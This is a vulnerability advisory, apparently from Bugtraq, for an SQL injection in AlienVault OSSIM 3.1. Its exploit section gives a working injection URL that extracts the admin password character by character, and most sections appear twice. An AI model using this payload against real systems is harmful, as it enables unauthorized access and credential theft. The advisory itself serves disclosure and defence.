AlienVault Open Source SIEM (OSSIM) SQL Injection Vulnerability
BID:54654
Info
AlienVault Open Source SIEM (OSSIM) SQL Injection Vulnerability
| Bugtraq ID: | 54654 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 23 2012 12:00AM |
| Updated: | Jul 23 2012 12:00AM |
| Credit: | muts |
| Vulnerable: |
AlienVault Open Source SIEM (OSSIM) 3.1 |
| Not Vulnerable: | |
Discussion
AlienVault Open Source SIEM (OSSIM) SQL Injection Vulnerability
Open Source SIEM (OSSIM) is prone to an SQL-injection vulnerability.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Open Source SIEM (OSSIM) 3.1 is vulnerable; other versions may also be affected.
Open Source SIEM (OSSIM) is prone to an SQL-injection vulnerability.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Open Source SIEM (OSSIM) 3.1 is vulnerable; other versions may also be affected.
Exploit / POC
AlienVault Open Source SIEM (OSSIM) SQL Injection Vulnerability
An attacker can exploit the issue using a browser.
The following example URI is available:
https://www.example.com/ossim/forensics/base_qry_main.php?tcp_port[0][0]=1=1) and 2 = mid((select pass from ossim.users where login=0x61646d696e),1,1)--&tcp_port[0][1]=layer4_dport&tcp_port[0][2]==&tcp_port[0][3]=17500&tcp_port[0][4]= &tcp_port[0][5]= &tcp_flags[0]= &layer4=TCP&num_result_rows=-1&current_view=-1&submit=QUERYDBP&sort_order=sig_a&clear_allcriteria=1&clear_criteria=time
An attacker can exploit the issue using a browser.
The following example URI is available:
https://www.example.com/ossim/forensics/base_qry_main.php?tcp_port[0][0]=1=1) and 2 = mid((select pass from ossim.users where login=0x61646d696e),1,1)--&tcp_port[0][1]=layer4_dport&tcp_port[0][2]==&tcp_port[0][3]=17500&tcp_port[0][4]= &tcp_port[0][5]= &tcp_flags[0]= &layer4=TCP&num_result_rows=-1&current_view=-1&submit=QUERYDBP&sort_order=sig_a&clear_allcriteria=1&clear_criteria=time
Solution / Fix
AlienVault Open Source SIEM (OSSIM) SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].
References
AlienVault Open Source SIEM (OSSIM) SQL Injection Vulnerability
References:
References:
- Alienvault Homepage (Alienvault)